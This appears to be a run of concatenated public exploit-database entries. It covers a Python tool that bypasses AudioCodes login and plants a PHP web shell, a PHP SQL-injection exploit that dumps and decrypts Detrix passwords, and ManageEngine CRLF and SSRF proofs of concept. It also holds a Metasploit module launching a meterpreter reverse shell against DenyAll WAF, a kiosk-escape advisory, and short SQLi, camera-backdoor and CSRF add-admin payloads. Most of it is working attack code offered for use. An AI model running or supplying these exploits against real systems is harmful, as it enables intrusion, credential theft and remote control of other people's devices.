# CVE: CVE-2022-24627, CVE-2022-24629, CVE-2022-24630, CVE-2022-24632
#!/usr/bin/python3
import requests
import sys
import time
import re
import colorama
from colorama import Fore, Style
import uuid
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
def menu():
print('-----------------------------------------------------------------------\n'
'AudioCodes Device Manager Express 45 78 70 6C 6F 69 74 \n'
'-----------------------------------------------------------------------')
def optionlist(s,target):
try:
print('\nOptions: (Press any other key to quit)\n'
'-----------------------------------------------------------------------\n'
'1: Upload arbitrary file\n'
'2: Download arbitrary file\n'
'3: Execute command\n'
'4: Add backdoor\n'
'-----------------------------------------------------------------------')
option = int(input('Select: '))
if(option == 1):
t = 'a'
upload_file(s,target,t)
elif(option == 2):
download_file(s,target)
elif(option == 3):
execute(s,target)
elif(option == 4):
t = 'b'
upload_file(s,target,t)
except:
sys.exit()
def bypass_auth(target):
try:
print(f'\nTrying to bypass authentication..\n')
url = f'http://{target}/admin/AudioCodes_files/process_login.php'
s = requests.Session()
# CVE-2022-24627
payload_list = ['\'or 1=1#','\\\'or 1=1#','admin']
for payload in payload_list:
body = {'username':'admin','password':'','domain':'','p':payload}
r = s.post(url, data = body)
if('Configuration' in r.text):
print(f'{Fore.GREEN}(+) Authenticated as Administrator on: {target}{Style.RESET_ALL}')
time.sleep(1)
return(s)
else:
print(f'{Fore.RED}(-) Computer says no, can\'t login, try again..{Style.RESET_ALL}')
main()
except:
sys.exit()
def upload_file(s,target,t):
try:
url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?type='
param = uuid.uuid4().hex
file = input('\nEnter file name: ')
# read extension
ext = file.rsplit( ".", 1 )[ 1 ]
if (t=='b'):
# remove extension
file = file.rsplit( ".", 1 )[ 0 ] + '.php'
ext = 'php'
patch = '1'
if(file != ''):
if(patch_ext(s,target,patch,ext)):
# CVE-2022-24629
print(f'{Fore.GREEN}(+) Success{Style.RESET_ALL}')
if(t=='a'):
dest = input('\nEnter destination location (ex. c:\): ')
print(f'\nUploading file to {target}: {dest}{file}')
files = {'myfile': (file, open(file,'rb'), 'text/html')}
body = {'dir': f'{dest}', 'type': '', 'Submit': 'Upload'}
r = s.post(url, files=files, data=body)
print(f'{Fore.GREEN}(+) Done{Style.RESET_ALL}')
if(t=='b'):
shell = f'<?php echo shell_exec($_GET[\'{param}\']); ?>'
files = {f'myfile': (file, shell, 'text/html')}
body = {'dir': 'C:/audiocodes/express/WebAdmin/region/', 'type': '', 'Submit': 'Upload'}
r = s.post(url, files=files, data=body)
print(f'\nBackdoor location:')
print(f'{Fore.GREEN}(+) http://{target}/region/{file}?{param}=dir{Style.RESET_ALL}')
patch = '2'
time.sleep(1)
patch_ext(s,target,patch,ext)
else:
print(f'{Fore.RED}(-) Could not whitelist extension {ext}.. Try something else\n{Style.RESET_ALL}')
except:
print(f'{Fore.RED}(-) Computer says no..{Style.RESET_ALL}')
patch = '2'
patch_ext(s,target,patch,ext)
def download_file(s,target):
# CVE-2022-24632
try:
file = input('\nFull path to file, eg. c:\\windows\win.ini: ')
if(file != ''):
url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?view={file}'
r = s.get(url)
if (len(r.content) > 0):
print(f'{Fore.GREEN}\n(+) File {file} downloaded\n{Style.RESET_ALL}')
file = str(file).split('\\')[-1:][0]
open(file, 'wb').write(r.content)
else:
print(f'{Fore.RED}\n(-) File not found..\n{Style.RESET_ALL}')
else:
print(f'{Fore.RED}\n(-) Computer says no..\n{Style.RESET_ALL}')
except:
sys.exit()
def execute(s,target):
try:
while True:
# CVE-2022-24631
command = input('\nEnter a command: ')
if(command == ''):
optionlist(s,target)
break
print(f'{Fore.GREEN}(+) Executing: {command}{Style.RESET_ALL}')
body = 'ssh_command='+ command
url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?cmd=ssh'
r = s.post(url, data = body, headers=headers)
print('-----------------------------------------------------------------------')
time.sleep(1)
print((", ".join(re.findall(r'</form>(.+?)</section>',str(r.content)))).replace('\\r\\n', '').replace('</div>', '').replace('<div>', '').replace('</DIV>', '').replace('<DIV>', '').replace('<br/>', '').lstrip())
print('-----------------------------------------------------------------------')
except:
sys.exit()
def patch_ext(s,target,opt,ext):
try:
if(opt == '1'):
print('\nTrying to add extension to whitelist..')
body = {'action':'saveext','extensions':f'.cab,.cfg,.csv,.id,.img,.{ext},.zip'}
if(opt == '2'):
print('\nCleaning up..')
body = {'action':'saveext','extensions':'.cab,.cfg,.csv,.id,.img,.zip'}
print(f'{Fore.GREEN}(+) {ext.upper()} extension removed\n{Style.RESET_ALL}')
url = f'http://{target}/admin/AudioCodes_files/ajax/ajaxGlobalSettings.php'
r = s.post(url, data = body, headers=headers)
time.sleep(1)
if(f'{ext}' in r.text):
return True
except:
sys.exit()
def main():
if len(sys.argv) != 2:
print(' Usage: ' + sys.argv[0] + ' <target IP>')
print(' Example: ' + sys.argv[0] + ' 172.16.86.154')
sys.exit(1)
target = sys.argv[1]
menu()
s = bypass_auth(target)
if(s):
optionlist(s,target)
if __name__ == '__main__':
main()
# Timeline
# 11-11-2021 Vulnerabilities discovered
# 12-11-2021 PoC written
# 15-11-2021 Details shared with vendor
# 02-12-2021 Vendor confirmed vulnerabilities
# 03-12-2021 CVE's requested
# 09-12-2021 Vendor replied with solution and notified customers
# 07-02-2022 Product EOL announced
# 10-03-2022 CVE's assigned
# 02-12-2022 Disclosure of findings
# Exploit Title: Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation
# Date: 2019-12-18
# Exploit Author: Vulnerability-Lab
# Vendor Homepage: https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml
# Tested on: Windows XP
Document Title:
===============
Deutsche Bahn Ticket Vending Machine - Local Kiosk Privilege Escalation Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2191
Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2019/12/13/zero-day-vulnerability-deutsche-bahn-ticket-machine-series-system-uncovered
Release Date:
=============
2019-12-14
Vulnerability Laboratory ID (VL-ID):
====================================
2191
Common Vulnerability Scoring System:
====================================
6.4
Vulnerability Class:
====================
Privilege Escalation
Product & Service Introduction:
===============================
Customers can buy tickets at our ticket machines at any time, regardless
of opening hours. Thus, the vending machine also
secures sales in rural areas.
- innovatively designed user guidance
- Real-time timetable information for rail traffic
- traveler information
- ticket paper supply
- free fault hotline: 0800 2886644
- Professional and contemporary maintenance
The ticket vending machine can also be configured according to
individual requirements. The housing can be designed as desired.
Customers can purchase their tickets with different means of payment.
User guidance is available in different languages.
(Copy of the Homepage:
https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml
)
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local kiosk
privilege escalation vulnerability in the deutsche bahn ticket vending
machine series with windows xp.
Vulnerability Disclosure Timeline:
==================================
2019-12-14: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Authentication Type:
====================
No authentication (guest)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Responsible Disclosure Program
Technical Details & Description:
================================
A kiosk mode escalation vulnerability has been discovered in the
official deutsche bahn ticket vending machine series for windows.
The security vulnerability allows local attackers to bypass the kiosk
mode to compromise the local file system and applications.
It is possible for local attackers to break out of the kiosk mode of the
Deutsche Bahn vending machine application if
the Password Agent (PasswordAgent.exe) of the system receives a timeout
or has a runtime error in the program
itself in the background. These errors can occur due to aborted
sessions, unclean logout or common errors when
using the application at system level.
In the event of a local error, attackers can bring the error message to
the foreground by pressing the number field - Cancel
during a transaction. After the error message becomes visible, the
attacker can click on a link of the error message where you
can normally see what the error report contains. The attacker will then
be redirected to a form in the error message, where he
can search for errors in a collection of microsoft articles via "Submit
/ Dont' Submit" or another link on the online path. There
the attacker clicks on it and receives the web browser. From the web
browser, the attacker retrieves the options menu and can access
the local system directory and has then the ability to compromise the
ticket vending machine with windows xp.
The error message is normally on those devices deactivated through a
hardening process of the servce provider. In that special case
the exception handling of windows was not deactivated or set to the
background, which allows the attacker to move through to other
options to finally access the file system via browser.
The ticket vending machine vulnerability requires no user interaction
and can only be exploited by local attackers with physical
device access. No keyboard or front loader opening required.
Vulnerable System(s):
[+] Windows XP
Affected Component(s):
[+] Exception Handling (Error Message Content)
Proof of Concept (PoC):
=======================
The local vulnerability can be exploited by local attackers with
physical device access without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
PoC: Sheet
PasswordAgent.exe := Unexpected Error (Background) - Runtime/Session/Timeout
=> Transaction Application => Cancel := Unexpected Error (Background) -
Runtime/Session/Timeout (Front)
=> Click Error Report => Click Search Collection => Web Browser => Local
File System => PWND!
What are attackers able to do when the file system of the vending
machine is accessable thus way?
1. Inject of local malware to the ticket machine (editor / debugger /
cmd / ps - exp. ransomware/malware)
2. Local manipulation for skimming devices to assist (transmit prepares)
2. Phishing of local credentials from screen via system (db browser
application)
3. Intercept or manipulation to access card information (local file
system - sniff/extract)
4. Crash or freeze the computer system (exp. kill of process / loop script)
5. Scare or joké activities (exp. html / js to front screens with web
browser or by a new window process)
Refernece(s):
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6457.JPG
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6458.JPG
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6460.JPG
Solution - Fix & Patch:
=======================
There are now several problems related to system hardening that can be
resolved:
1. It should not be possible for users with system user rights to use
the web browsers
2. The error message menu can be deactivated or completely modified
3. Some functions in menus can be deactivated by hardening (browser,
messages & Co.)
4. Check that all other tasks are always running in the background or
are being moved there permanently
5. The deutsche bahn vending machine application and user interface
should be shut down in the event of persistent errors in the foreground
6. The activities of the testing has been logged but did not triggered
any alert for defense purpose
Deutsche Bahn: Patch Rollout in Progress
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/073915298_0.png
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/dbatm78235.png
Security Risk:
==============
The security risk of the local ticket vending machine system
vulnerability is estimated as high. The bug to escalate can be easily
exploited by local interaction with the touch display to access the file
system.
Credits & Authors:
==================
Benjamin K.M. -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2019 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
#!/usr/bin/php
/*
# Exploit Title: Detrix EDMS cleartext user password remote SQLI exploit
# Google Dork:
# Date: Jul 2019
# Exploit Author: Burov Konstantin
# Vendor Homepage: forum.detrix.kz
# Software Link:
https://www.documentov.com/index.php?route=document/search&search=1.2.3.1505.zip&page=1&limit=20&document_uid=3d7bae5a-c2e5-11e8-9ed8-b7ed7eb0f5bb
# Version: any
# Tested on: Detrix 1.2.3.1505
*/
<?php
/*---------------------------CHANGE-ME--------------------------------*/
$URL = "http://192.168.56.6"; // Set URL for the target host
$user_id = 0; // 0 - Default admin ID
/*--------------------------------------------------------------------*/
$banner = "Exploiting SQLi vuln and password decrypting for Detrix\n".
"http://forum.detrix.kz\nhttps://github.com/sadshade/Detrix-Passwords-PoC \n".
"sad.2.shade@mail.com, 2019.\n\n";
// SQLi request
$sql_req =
"login' AND 99=CAST('a__'||(SELECT COALESCE(CAST(password AS ".
"CHARACTER(10000)),(CHR(32))) FROM manuscript.ref_system_users OR".
"DER BY id OFFSET " . $user_id . " LIMIT 1)::text||'__a' ".
"AS NUMERIC) AND 'a'='a";
$data = array('password' => 'pass',
'login' => $sql_req);
$options = array(
'http' => array(
'header' => "Content-type: application/x-www-form-urlencoded\r\n",
'method' => 'POST',
'content' => http_build_query($data)
)
);
// Key from %detrix%/system/utils/MSF_string.php
$sSuperDuperSecretKey =
"!-eeflslskdjfla;456864~}{fjkdlswkfkll@#$%#$9f0sf8a723#@";
echo $banner;
try {
$context = stream_context_create($options);
echo "Send SQLi to $URL...\n";
$result = file_get_contents($URL, false, $context);
} catch (Exception $e) {
echo 'Error: ', $e->getMessage(), "\n";
}
if ($result != "") {
if (preg_match("/\"a__(.+)__a\"/", $result, $encrypted_pass) == 1) {
$clear_pass = trim(
openssl_decrypt(base64_decode($encrypted_pass[1]),
"BF-ECB", $sSuperDuperSecretKey,
OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING)
); // Decrypt pass
echo "Pass for User id $user_id: $clear_pass \n";
} else echo "Error: no such User id:$user_id or empty password!\n";
} else echo "Error: empty Response or error!\n"
?>
# Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-02-14
# Software Link : http://www.desktopcentral.com
# Tested Version: 9.1.0 (Build No: 91084)
# Tested on: Windows 10
# Vulnerability Type: CRLF injection (CRLF) - 1
CVSS v3: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-93
Vulnerability description: CRLF injection vulnerability in ManageEngine
Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP
headers and conduct HTTP response splitting attacks via the fileName
parameter in a /STATE_ID/1613157927228/InvSWMetering.csv.
Proof of concept:
GET
https://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true
HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101
Firefox/85.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: keep-alive
Referer:
https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering
Upgrade-Insecure-Requests: 1
Content-Length: 0
Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;
STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;
showRefMsg=false; summarypage=false;
DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;
JSESSIONID=0B20DEF653941DAF5748931B67972CDB;
JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024
Host: localhost
Response:
HTTP/1.1 200 OK
Date:
Server: Apache
Pragma: public
Cache-Control: max-age=0
Expires: Wed, 31 Dec 1969 16:00:00 PST
SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;
Secure
Set-Cookie: buildNum=91084; Path=/
Set-Cookie: showRefMsg=false; Path=/
Set-Cookie: summarypage=false; Path=/
Set-Cookie: dc_customerid=1; Path=/
Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/
Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/
Set-Cookie: screenResolution=1280x1024; Path=/
Content-Disposition: attachment; filename=any
Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csv
X-dc-header: yes
Content-Length: 95
Keep-Alive: timeout=5, max=20
Connection: Keep-Alive
Content-Type: text/csv;charset=UTF-8
# Vulnerability Type: CRLF injection (CRLF) - 2
CVSS v3: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-93
Vulnerability description: CRLF injection vulnerability in ManageEngine
Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP
headers and conduct HTTP response splitting attacks via the fileName
parameter in a /STATE_ID/1613157927228/InvSWMetering.pdf.
Proof of concept:
GET
https://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true
HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101
Firefox/85.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: keep-alive
Referer:
https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering
Upgrade-Insecure-Requests: 1
Content-Length: 0
Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;
STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;
showRefMsg=false; summarypage=false;
DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;
JSESSIONID=0B20DEF653941DAF5748931B67972CDB;
JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024
Host: localhost
HTTP/1.1 200 OK
Date:
Server: Apache
Pragma: public
Cache-Control: max-age=0
Expires: Wed, 31 Dec 1969 16:00:00 PST
SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;
Secure
Set-Cookie: buildNum=91084; Path=/
Set-Cookie: showRefMsg=false; Path=/
Set-Cookie: summarypage=false; Path=/
Set-Cookie: dc_customerid=1; Path=/
Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/
Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/
Set-Cookie: screenResolution=1280x1024; Path=/
Content-Disposition: attachment; filename=any
Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013
X-dc-header: yes
Content-Length: 4470
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/pdf;charset=UTF-8
# Vulnerability Type: Server-Side Request Forgery (SSRF)
CVSS v3: 8.0
CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-918 Server-Side Request Forgery (SSRF)
Vulnerability description: Server-Side Request Forgery (SSRF) vulnerability
in ManageEngine Desktop Central 9.1.0 allows an attacker can force a
vulnerable server to trigger malicious requests to third-party servers or
to internal resources. This vulnerability allows authenticated attacker
with network access via HTTP and can then be leveraged to launch specific
attacks such as a cross-site port attack, service enumeration, and various
other attacks.
Proof of concept:
Save this content in a python file (ex. ssrf_manageenginedesktop9.py),
change the variable sitevuln value with ip address:
import argparse
from termcolor import colored
import requests
import urllib3
import datetime
urllib3.disable_warnings()
print(colored('''
------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------
''',"red"))
def smtpConfig_ssrf(target,port,d):
now1 = datetime.datetime.now()
text = ''
sitevuln = 'localhost'
url = 'https://
'+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin%
40manageengine.com
&validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin%
40manageengine.com'
cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73;
buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false;
JSESSIONID=D10A9C62D985A0966647099E14C622F8;
DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0'
try:
response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0
(Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':
'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': '
https://192.168.56.250:8383/smtpConfig.do','Cookie':
cookie,'Connection': 'keep-alive'},verify=False, timeout=10)
text = response.text
now2 = datetime.datetime.now()
rest = (now2 - now1)
seconds = rest.total_seconds()
if ('updateRefMsgCookie' in text):
return colored('Cookie lost',"yellow")
if d == "0":
print ('Time response: ' + str(rest) + '\n' + text + '\n')
if (seconds > 5.0):
return colored('open',"green")
else:
return colored('closed',"red")
except:
now2 = datetime.datetime.now()
rest = (now2 - now1)
seconds = rest.total_seconds()
if (seconds > 10.0):
return colored('open',"green")
else:
return colored('closed',"red")
return colored('unknown',"yellow")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 -
SSRF Open ports",required=True)
parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9
- SSRF Open ports",required=True)
parser.add_argument('-d','--debug', help="ManageEngine Desktop Central
9 - SSRF Open ports (0 print or 1 no print)",required=False)
args = parser.parse_args()
timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug)
print (args.ip + ':' + args.port + ' ' + timeresp + '\n')
And:
$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080
------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------
192.168.56.250:8080 open
$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777
------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------
192.168.56.250:7777 closed
# # # # #
# Exploit Title: Pasal - Departmental Store Management System v1.2 - SQL Injection
# Google Dork: N/A
# Date: 17.03.2017
# Vendor Homepage: http://webstarslab.com
# Software : http://webstarslab.com/products/pasal-departmental-store-management-system/
# Demo: http://webstarslab.com/departmental-store-management-system/store/
# Version: 1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/module.php?module=vendors&page=edit-vendors&id=[SQL]
# http://localhost/[PATH]/module.php?module=units&page=edit-units&id=[SQL]
# http://localhost/[PATH]/module.php?module=currency&page=edit-currency&id=[SQL]
# http://localhost/[PATH]/module.php?module=category&page=edit-category&id=[SQL]
# http://localhost/[PATH]/module.php?module=purchase&y=[SQL]&m=[SQL]
# tbl_users:id
# tbl_users:username
# tbl_users:password
# tbl_users:email
# tbl_users:full_name
# tbl_users:permission
# Etc..
# # # # #
source: https://www.securityfocus.com/bid/64478/info
DenyHosts is prone to a remote denial-of-service vulnerability.
Successfully exploiting this issue allows remote attackers to deny further SSH network access to arbitrary IP addresses, denying service to legitimate users.
ssh -l 'Invalid user root from 123.123.123.123' 21.21.21.21
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "DenyAll Web Application Firewall Remote Code Execution",
'Description' => %q{
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a
terminal command under the context of the web server user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/']
],
'DefaultOptions' =>
{
'SSL' => true,
'RPORT' => 3001,
'Payload' => 'python/meterpreter/reverse_tcp'
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [[ 'Automatic', { }]],
'Privileged' => false,
'DisclosureDate' => "Sep 19 2017",
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/'])
]
)
end
def get_token
# Taking token by exploiting bug on first endpoint.
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
'vars_get' => {
'applianceUid' => 'LOCALUID',
'typeOf' => 'debug'
}
})
if res && res.code == 200 && res.body.include?("iToken")
res.body.scan(/"iToken";s:32:"([a-z][a-f0-9]{31})";/).flatten[0]
else
nil
end
end
def check
# If we've managed to get token, that means target is most likely vulnerable.
token = get_token
if token.nil?
Exploit::CheckCode::Safe
else
Exploit::CheckCode::Appears
end
end
def exploit
# Get iToken from unauthenticated accessible endpoint
print_status('Extracting iToken value')
token = get_token
if token.nil?
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
else
print_good("Awesome. iToken value = #{token}")
end
# Accessing to the vulnerable second endpoint where we have command injection with valid iToken
print_status('Trigerring command injection vulnerability with iToken value.')
r = rand_text_alpha(5 + rand(3));
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'),
'vars_post' => {
'iToken' => token,
'tag' => 'tunnel',
'stime' => r,
'type' => "#{r}$(python -c \"#{payload.encoded}\")"
}
})
end
end
# Exploit Title: Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE)
# Date: 27 July 2021
# Exploit Author: Ivan Nikolsky (enty8080)
# Vendor Homepage: https://denver.eu/products/smart-home-security/denver-shc-150/c-1024/c-1243/p-3824
# Version: Denver SHC-150 (all firmware versions)
# Tested on: Denver SHC-150
Backdoor was found in a Denver SHC-150 Smart Wifi Camera. Maybe other models also have this backdoor too.
So, backdoor is a factory telnet credential - `default`. Just open the telnet connection with the camera on port 23 and enter `default` (yes, on these cameras, telnet service is served on port 23). After this, you'll get a Linux shell. Backdoor allows an attacker to execute commands on OS lever through telnet.
PoC:
```
enty8080@Ivans-Air ~ % telnet 192.168.2.118 23
Trying 192.168.2.118...
Connected to pc192-168-2-118.
Escape character is '^]'.
goke login: default
$ ls /
bin home linuxrc opt run tmp
dev init media proc sbin usr
etc lib mnt root sys var
$ pwd
/home/default
$ exit
Connection closed by foreign host.
enty8080@Ivans-Air ~ %
```
# Exploit Title: Denver IP Camera SHO-110 - Unauthenticated Snapshot
# Date: 28 July 2021
# Exploit Author: Ivan Nikolsky (enty8080)
# Vendor Homepage: https://denver.eu/products/smart-home-security/denver-sho-110/c-1024/c-1243/p-3826
# Version: Denver SHO-110 (all firmware versions)
# Tested on: Denver SHO-110
Backdoor was found in a Denver SHO-110 IP Camera. Maybe other models also have this backdoor too.
So, the backdoor located in the camera's second http service, allows the attacker to get a snapshot through `/snapshot` endpoint. There are two http services in camera: first - served on port 80, and it requires authentication, and the second - served on port 8001, and it does not require authentication.
It's possible to write a script that will collect snapshots and add them to each other, so the attacker will be able to disclosure the camera stream.
PoC:
http://<host>:8001/snapshot
# # # # #
# Vulnerability: SQL Injection + Authentication Bypass
# Date: 18.01.2017
# Vendor Homepage: http://www.scriptgiant.com/
# Script Name: Dentist Website Script
# Script Buy Now: http://www.popularclones.com/products/Dentist-Website-Script
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Authentication Bypass :
# http://localhost/[PATH]/admin_giant/ and set Username:'or''=' and Password to 'or''=' and hit enter.
# SQL Injection/Exploit :
# http://localhost/[PATH]/admin_giant/add_gallery.php?id=[SQL]
# http://localhost/[PATH]/admin_giant/client.entry.php?id=[SQL]
# E.t.c.... Other files, too. SQL There are security vulnerabilities.
# # # # #
# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Cross Site Request Forgery (Add Admin)
# Date: 15-05-2021
# Exploit Author: Reza Afsahi
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: PHP 7.4.11 , Linux x64_x86
# --- Proof of concept --- #
# Vulnerable file : http://localhost/APR/admin/user.php
# Exploit:
<html>
<head>
<title>Add Admin</title>
</head>
<body>
<h1> Absolutely Not Vulnerable Site :D </h1>
<form method="POST" action="http://127.0.0.1/APR/admin/user.php">
<input type="hidden" name="username" value="lol">
<input type="hidden" name="password" value="321" >
<button type="submit" name="submit">Click</button>
</form>
</body>
</html>